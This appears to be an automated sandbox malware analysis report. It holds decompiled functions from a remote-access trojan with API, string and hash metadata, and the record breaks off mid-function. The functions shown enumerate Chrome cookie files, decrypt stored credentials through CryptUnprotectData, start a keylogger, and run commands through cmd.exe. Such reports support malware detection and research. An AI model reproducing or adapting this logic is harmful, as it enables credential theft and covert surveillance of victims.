                    				void* __ebx;
                    				void* __ebp;
                    				int _t50;
                    				void* _t54;
                    				void* _t56;
                    				signed int _t87;
                    				struct HWND__* _t149;
                    				void* _t152;
                    
                    				_t147 = __edi;
                    				_push(_t87);
                    				_t149 = _a4;
                    				GetWindowThreadProcessId(_t149,  &_v992);
                    				E0041A6E9(_t87,  &_v940, _t149);
                    				E0041A6E9(_t87,  &_v964, _v992);
                    				GetWindowTextW(_t149,  &_v604, 0x12c);
                    				_t50 = IsWindowVisible(_t149);
                    				_t156 = _t50;
                    				_t88 = _t87 & 0xffffff00 | _t50 != 0x00000000;
                    				E0040415E(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v988, _v992, _t152,  &_v604);
                    				_t54 = E0041A879(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v656, E0041AB76( &_v632, _v996));
                    				_t56 = E0041A879(_t88,  &_v680,  &_v992);
                    				L00403356(E00408832(_t88,  &_v920, E00402E81( &_v896, E00408832(_t88,  &_v872, E00402EF0(_t88,  &_v848, E00408832(_t88,  &_v824, E00402E81( &_v800, E00408832(_t88,  &_v776, E00402EF0(_t88,  &_v752, E00408832(_t88,  &_v728, E0041A6E9(_t88,  &_v704, _t88 & 0x000000ff), __edi, _t152, _t50, 0x46a788), _t152, _t156,  &_v944), __edi, _t152, _t156, 0x46a788), _t56), __edi, _t152, _t156, 0x46a788), _t152, _t156,  &_v968), _t147, _t152, _t156, 0x46a788), _t54), _t147, _t152, _t156, 0x46a630));
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401FB8();
                    				E00401FB8();
                    				return 1;
                    			}

                    APIs
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416603
                    • GetWindowTextW.USER32 ref: 0041662F
                    • IsWindowVisible.USER32 ref: 00416636
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Process$OpenTextThreadVisible
                    • String ID: h5G
                    • API String ID: 478698014-4077671695
                    • Opcode ID: 57e314817de64fc6c7a8f4a46e538bb9a44f2cd3452858200bb4f184f874004f
                    • Instruction ID: 99c6d8f7261b3cee98e9cdba014bcc0a4643868b1acb47591d6874b1b0f6d138
                    • Opcode Fuzzy Hash: 57e314817de64fc6c7a8f4a46e538bb9a44f2cd3452858200bb4f184f874004f
                    • Instruction Fuzzy Hash: E241E4311082419BC324FB65D891DDFF3E9AFD4354F50893EF48A921E1EF349A4ACA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 27%
                    			E0041B35B(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				char* _t10;
                    				void* _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t17;
                    				void* _t18;
                    				void* _t24;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    				void* _t32;
                    				void* _t34;
                    
                    				_t21 = __edx;
                    				_t24 = __edx;
                    				_t12 = __ecx;
                    				if(_t12 == 0) {
                    					_push(1);
                    					_t28 = _t27 - 0x18;
                    					_t10 = "0";
                    					E00402073(_t10, _t28, __edx, _t26, _t10);
                    					_t25 = "Control Panel\\Desktop";
                    					_push("WallpaperStyle");
                    					_t22 = "Control Panel\\Desktop";
                    					E00412A57(_t28, "Control Panel\\Desktop");
                    					_push(1);
                    					_t14 = _t28 + 0x20 - 0x18;
                    					_push(_t10);
                    					goto L11;
                    				} else {
                    					_t15 = _t12 - 1;
                    					if(_t15 == 0) {
                    						_push(1);
                    						_t32 = _t27 - 0x18;
                    						_t16 = _t32;
                    						_push("2");
                    						goto L7;
                    					} else {
                    						_t17 = _t15 - 1;
                    						if(_t17 == 0) {
                    							_push(1);
                    							_t32 = _t27 - 0x18;
                    							_t16 = _t32;
                    							_push("10");
                    							goto L7;
                    						} else {
                    							_t18 = _t17 - 1;
                    							if(_t18 == 0) {
                    								_push(1);
                    								_t32 = _t27 - 0x18;
                    								_t16 = _t32;
                    								_push("6");
                    								L7:
                    								E00402073(_t10, _t16, _t21, _t26);
                    								_t25 = "Control Panel\\Desktop";
                    								_push("WallpaperStyle");
                    								_t22 = "Control Panel\\Desktop";
                    								E00412A57(_t16, "Control Panel\\Desktop");
                    								_push(1);
                    								_t14 = _t32 + 0x20 - 0x18;
                    								_push("0");
                    								goto L11;
                    							} else {
                    								if(_t18 == 1) {
                    									_push(1);
                    									_t34 = _t27 - 0x18;
                    									E00402073(_t10, _t34, __edx, _t26, "0");
                    									_t25 = "Control Panel\\Desktop";
                    									_push("WallpaperStyle");
                    									_t22 = "Control Panel\\Desktop";
                    									E00412A57(_t34, "Control Panel\\Desktop");
                    									_push(1);
                    									_t14 = _t34 + 0x20 - 0x18;
                    									_push("1");
                    									L11:
                    									E00402073(_t10, _t14, _t22, _t26);
                    									E00412A57(_t14, _t25);
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return SystemParametersInfoW(0x14, 0, _t24, 3);
                    			}

                    APIs
                    • SystemParametersInfoW.USER32 ref: 0041B450
                      • Part of subcall function 00412A57: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                      • Part of subcall function 00412A57: RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                      • Part of subcall function 00412A57: RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                    • Instruction ID: 353071605875722e2d2290b0d1df67e202755458c4192b98c6391b796ea34086
                    • Opcode Fuzzy Hash: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                    • Instruction Fuzzy Hash: 96114D32F8061036D918317A4E1BBAE28068786F50F55815FFB013A2C6E5CF5AB143CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0040BB66(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				int _t22;
                    				int _t32;
                    				void* _t59;
                    				void* _t63;
                    				void* _t64;
                    				void* _t66;
                    				void* _t67;
                    
                    				_t59 = __edx;
                    				_t40 = __ebx;
                    				_t63 = __ecx;
                    				E0040BEC3(__ecx);
                    				E0040BA3D(__ebx,  &_v52, _t59, __ecx, __eflags);
                    				E004087F0( &_v28,  &_v52, _t67, L"User Data\\Default\\Network\\Cookies");
                    				_t22 = PathFileExistsW(E00401EE4( &_v28));
                    				_t69 = _t22;
                    				if(_t22 != 0) {
                    					E0040BE24(__ebx, _t63, _t67, _t69,  &_v28);
                    				}
                    				E00401EF3( &_v28,  &_v52, _t64, E004087F0( &_v76,  &_v52, _t67, L"User Data\\Profile ?\\Network\\Cookies"));
                    				E00401EE9();
                    				_t66 = 1;
                    				do {
                    					_push(E0041A762(_t40,  &_v76, _t66));
                    					E0040BECD(E0040245C() - 0x11,  &_v76);
                    					E00401EE9();
                    					_t32 = PathFileExistsW(E00401EE4( &_v28));
                    					_t71 = _t32;
                    					if(_t32 != 0) {
                    						E0040BE24(_t40, _t63, _t67, _t71,  &_v28);
                    					}
                    					_t66 = _t66 + 1;
                    				} while (_t66 < 0x64);
                    				E00401EE9();
                    				E00401EE9();
                    				return _t63;
                    			}

                    APIs
                      • Part of subcall function 0040BA3D: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D,?), ref: 0040BA70
                    • PathFileExistsW.SHLWAPI(00000000,?), ref: 0040BB97
                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040BC02
                    Strings
                    • User Data\Default\Network\Cookies, xrefs: 0040BB7D
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040BBAC
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: 99c7e4874861133ee03dbd62fe3fe4db4b543edd9fa5d0ea7d7a46575ae185ed
                    • Instruction ID: d3bd7a9e1c96093492625e3e5ee86b1017f979b14bb93b73e7de0ea03ad3c358
                    • Opcode Fuzzy Hash: 99c7e4874861133ee03dbd62fe3fe4db4b543edd9fa5d0ea7d7a46575ae185ed
                    • Instruction Fuzzy Hash: F521E2719101195ACB04F7A6DC96CEEB7B8EE50718B44003FF901B21E2EF789946C6DC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040A461(void* __ecx, void* __edx) {
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t7;
                    				void* _t18;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t31 = __ecx;
                    				_t38 =  *((char*)(__ecx + 0x4a));
                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                    					 *((char*)(__ecx + 0x4a)) = 1;
                    					E00402073(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
                    					_t34 = _t33 - 0x18;
                    					E0041A7B9(_t33 - 0x18,  &_v28);
                    					E0040A6DA(_t18, _t31, _t38);
                    					E00401FB8();
                    					E00402073(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
                    					E00402073(_t18, _t34,  &_v28, _t32, "i");
                    					E0041A04A(_t18, "Online Keylogger Started");
                    					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
                    						if( *_t31 == 0) {
                    							CreateThread(0, 0, E0040986A, _t31, 0, 0);
                    						}
                    						CreateThread(0, 0, E0040988C, _t31, 0, 0);
                    					}
                    					return CreateThread(0, 0, E00409898, _t31, 0, 0);
                    				}
                    				return _t7;
                    			}













                    APIs
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • CreateThread.KERNEL32 ref: 0040A4E1
                    • CreateThread.KERNEL32 ref: 0040A4ED
                    • CreateThread.KERNEL32 ref: 0040A4F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    • Opcode ID: 9b11fab870bc5f2c31dcf5d4c9043d72623101c97d598f2e78c98917e69f52de
                    • Instruction ID: 2918f94b29e643706cc8194107c31a37d0557916cfe4d3346365f420470abdd0
                    • Opcode Fuzzy Hash: 9b11fab870bc5f2c31dcf5d4c9043d72623101c97d598f2e78c98917e69f52de
                    • Instruction Fuzzy Hash: 4501A1A5A003083EE62076769C8ADBF7A6CCA92398F40057FF545222C3D9BD1D5582FA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 28%
                    			E004060D7(intOrPtr __ecx, char __edx, char* _a4) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				_Unknown_base(*)()* _t11;
                    				intOrPtr _t18;
                    				intOrPtr _t24;
                    				char* _t26;
                    				void* _t29;
                    				char* _t32;
                    
                    				_t11 =  *0x470af4; // 0x0
                    				_v16 = __ecx;
                    				_v20 = __edx;
                    				if(_t11 == 0) {
                    					_t11 = GetProcAddress(LoadLibraryA("crypt32"), "CryptUnprotectData");
                    					 *0x470af4 = _t11;
                    				}
                    				_push( &_v12);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push( &_v20);
                    				if( *_t11() == 0) {
                    					return 0;
                    				} else {
                    					_t24 = _v12;
                    					_t26 = _a4;
                    					if(_t24 == 0) {
                    						L7:
                    						 *((char*)(_t24 + _t26)) = 0;
                    						return _v12;
                    					}
                    					_t32 = _t26;
                    					_t29 = _v8 - _t26;
                    					_t18 = _t24;
                    					do {
                    						 *_t32 =  *((intOrPtr*)(_t29 + _t32));
                    						_t32 = _t32 + 1;
                    						_t18 = _t18 - 1;
                    					} while (_t18 != 0);
                    					goto L7;
                    				}
                    			}














                    APIs
                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,0040609F,?,00000000,?), ref: 004060F6
                    • GetProcAddress.KERNEL32(00000000), ref: 004060FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    • Opcode ID: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                    • Instruction ID: beb262a90158fb4cf50087408c2c088a9110264107d79c3b72559a6e192aff88
                    • Opcode Fuzzy Hash: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                    • Instruction Fuzzy Hash: 75012831A04315ABCF18CFACDC409ABBBB8EF54300F0002BEE956E7341D675D9008798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040513C() {
                    				void* __ebx;
                    				void* __ecx;
                    				long _t19;
                    				void* _t24;
                    				intOrPtr _t28;
                    				void* _t29;
                    				void* _t30;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    				intOrPtr _t40;
                    
                    				_t31 = _t24;
                    				 *((intOrPtr*)(_t31 + 0x78)) = 0;
                    				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
                    					L3:
                    					 *((char*)(_t31 + 0x5c)) = 0;
                    					_t40 =  *0x470d48; // 0x0
                    					if(_t40 != 0) {
                    						_t34 = _t33 - 0x18;
                    						E00402073(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
                    						E00402073(0, _t34 - 0x18, _t29, _t32, "E");
                    						E0041A04A(0, _t30);
                    					}
                    					E00404E06(_t29);
                    					return 1;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
                    					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
                    					_t28 =  *((intOrPtr*)(_t31 + 0x78));
                    					if(_t19 == 0) {
                    						break;
                    					}
                    					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
                    						continue;
                    					}
                    					goto L3;
                    				}
                    				CloseHandle( *(_t31 + 0x60));
                    				 *(_t31 + 0x60) = 0;
                    				 *((char*)(_t31 + 0x5c)) = 0;
                    				SetEvent( *(_t31 + 0x64));
                    				return 0;
                    			}















                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                    • CloseHandle.KERNEL32(?), ref: 004051AA
                    • SetEvent.KERNEL32(?), ref: 004051B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    • Opcode ID: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                    • Instruction ID: 87dc7bd1a7f2c12f2d5d2db554b8500d969d653d79ad8885273b8c0985c03cd0
                    • Opcode Fuzzy Hash: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                    • Instruction Fuzzy Hash: 1401F531A44B40AFE7226B36DC4551B7FD0FF01301700097FF18356AA2DA78A440CF5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DD37
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                    • Instruction ID: c83b488e6c0b567c715bed89e41106fb5d46d583803a0575b5f187d309fe0aa3
                    • Opcode Fuzzy Hash: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                    • Instruction Fuzzy Hash: 5401D6B1E487087AE714EAD5CC13FBA77685F10705F50403FB906761C2EABC6549CA2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00415181(void* __edx, void* __ebp, void* __eflags, char _a16, char _a52, void* _a76, char _a80, void* _a152, void* _a176) {
                    				void* _t11;
                    
                    				_t41 = __eflags;
                    				_t11 = E0040415E(0,  &_a80, __edx, __ebp, E00401F8B(E00401E45( &_a16, __edx, __ebp, __eflags, 0)));
                    				_t35 = L"/C ";
                    				ShellExecuteW(0, L"open", L"cmd.exe", E00401EE4(E004042DC(0,  &_a52, L"/C ", __ebp, _t41, _t11)), 0, 0);
                    				E00401EE9();
                    				E00401EE9();
                    				E00401E6D( &_a16, _t35);
                    				E00401FB8();
                    				E00401FB8();
                    				return 0;
                    			}





                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    • Opcode ID: fa60b287fd240e61623fdd592e520166bb37bdd1ca281026a9f2703f3b00b510
                    • Instruction ID: b910b50d10bf9c10a53822f7bfccbc49879064c70acfec78918e038c0e9cbf8d
                    • Opcode Fuzzy Hash: fa60b287fd240e61623fdd592e520166bb37bdd1ca281026a9f2703f3b00b510
                    • Instruction Fuzzy Hash: ADF012712083045AC314FBB2DC959AFB3E8AB90319F500C3FB546611E2EF389959C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0040D4AA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				char _v16;
                    				signed int _t34;
                    				signed int* _t49;
                    				signed int* _t57;
                    				void* _t65;
                    				signed int* _t66;
                    
                    				_t65 = __ecx;
                    				E00433BCB(__ecx, 0);
                    				E0040F09D(__ecx + 4);
                    				E0040F09D(__ecx + 0xc);
                    				E0040F087(__ecx + 0x14);
                    				E0040F087(__ecx + 0x1c);
                    				E0040F09D(__ecx + 0x24);
                    				E0040F09D(__ecx + 0x2c);
                    				_t76 = _a4;
                    				if(_a4 == 0) {
                    					_t49 =  &_v16;
                    					E0040D455(_t49, "bad locale name");
                    					E004379F6( &_v16, 0x46cce0);
                    					asm("int3");
                    					_push(_t65);
                    					_t66 = _t49;
                    					E00433F5E(_t66);
                    					E0040F082( &(_t66[0xb]));
                    					E0040F082( &(_t66[9]));
                    					E0040F082( &(_t66[7]));
                    					E0040F082( &(_t66[5]));
                    					E0040F082( &(_t66[3]));
                    					E0040F082( &(_t66[1]));
                    					_t57 = _t66;
                    					_t34 =  *_t57;
                    					__eflags = _t34;
                    					if(_t34 == 0) {
                    						return E004441D1(4);
                    					} else {
                    						__eflags = _t34 - 8;
                    						if(_t34 < 8) {
                    							_t37 = 0x470060 + _t34 * 0x18;
                    							__eflags = 0x470060 + _t34 * 0x18;
                    							return E00434470(0x470060 + _t34 * 0x18, _t37);
                    						}
                    						return _t34;
                    					}
                    				} else {
                    					E00433F13(__ebx, __edx, __edi, _t76, __ecx, _a4);
                    					return _t65;
                    				}
                    			}










                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040D4B5
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040D4F4
                      • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F32
                      • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F56
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D51A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    • Opcode ID: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                    • Instruction ID: 7d5d85bd939eae65a08207342b5a69e68fd95b80f34b046828c98c3172fb135a
                    • Opcode Fuzzy Hash: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                    • Instruction Fuzzy Hash: 72F0A4314446049AC334FF61D853A9FB3689F14758F90453FF686228D7EF38AA0CC699
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00412903(void* __ecx, void* __edx, short* _a4, char _a8) {
                    				void* _v8;
                    				int _v12;
                    				char _v2060;
                    				void* __ebp;
                    				void* _t19;
                    				void* _t23;
                    				void* _t24;
                    
                    				_t22 = __edx;
                    				_v12 = 0x400;
                    				_t23 = __ecx;
                    				if(RegOpenKeyExW(__edx, _a4, 0, 0x20019,  &_v8) != 0) {
                    					_push(0x46a8f0);
                    				} else {
                    					_t6 =  &_a8; // 0x40e830
                    					RegQueryValueExW(_v8,  *_t6, 0, 0,  &_v2060,  &_v12);
                    					RegCloseKey(_v8);
                    					_push( &_v2060);
                    				}
                    				E0040415E(_t19, _t23, _t22, _t24);
                    				return _t23;
                    			}











                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                    • RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                    • RegCloseKey.ADVAPI32(?), ref: 0041294D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: 0@
                    • API String ID: 3677997916-11155133
                    • Opcode ID: ccdfa338f3f44b7a88e38bb291f8a30c6f4bdc73eae542fed91e2e6e6fd2fa95
                    • Instruction ID: c7fd1c892b01a83c80440586cf5eccaa6983c25e434fa7726a62adcc2e55f33b
                    • Opcode Fuzzy Hash: ccdfa338f3f44b7a88e38bb291f8a30c6f4bdc73eae542fed91e2e6e6fd2fa95
                    • Instruction Fuzzy Hash: CCF0C275A0021CFBDB109B90EC45FDE7BBCEB04B11F1040B2BA04F5291DAB4AB949BD8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004013F2() {
                    				_Unknown_base(*)()* _t2;
                    
                    				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                    				 *0x4736e4 = _t2;
                    				return _t2;
                    			}





                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                    • GetProcAddress.KERNEL32(00000000), ref: 00401403
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    • Opcode ID: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                    • Instruction ID: 339f5e680ac259f41fdaf7538df7a013b816c33a7b3ecda91f69a778ee4b915d
                    • Opcode Fuzzy Hash: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                    • Instruction Fuzzy Hash: 89B092B0585700ABC6007FB0BC0D9493A24A604703B1001B2B001A2672EB7991909E3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401497() {
                    				_Unknown_base(*)()* _t2;
                    
                    				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                    				 *0x47379c = _t2;
                    				return _t2;
                    			}





                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                    • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    • Opcode ID: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                    • Instruction ID: a235115c4c7ff8ecad93221cd3e986331959d115ecffc12b26486691d28a12a6
                    • Opcode Fuzzy Hash: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                    • Instruction Fuzzy Hash: 9BB092F05657009BCB402FA0BC0E9053B24A604713B208AB2B009A3162EB7D90909F2F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00448884(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				char _v40;
                    				intOrPtr _v48;
                    				char _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t86;
                    				signed int _t92;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				void* _t101;
                    				void* _t102;
                    				void* _t104;
                    				void* _t107;
                    				void* _t109;
                    				void* _t111;
                    				void* _t115;
                    				char* _t116;
                    				void* _t119;
                    				signed int _t121;
                    				signed int _t128;
                    				signed int* _t129;
                    				signed int _t136;
                    				signed int _t137;
                    				char _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t146;
                    				signed int _t151;
                    				char _t156;
                    				char _t157;
                    				void* _t161;
                    				unsigned int _t162;
                    				signed int _t164;
                    				signed int _t166;
                    				signed int _t170;
                    				void* _t171;
                    				signed int* _t172;
                    				signed int _t174;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				signed int _t184;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    
                    				_t171 = __edx;
                    				_t181 = _a24;
                    				if(_t181 < 0) {
                    					_t181 = 0;
                    				}
                    				_t184 = _a8;
                    				 *_t184 = 0;
                    				E004390B7(0,  &_v52, _t171, _a36);
                    				_t5 = _t181 + 0xb; // 0xb
                    				if(_a12 > _t5) {
                    					_t172 = _a4;
                    					_t142 = _t172[1];
                    					_v36 =  *_t172;
                    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
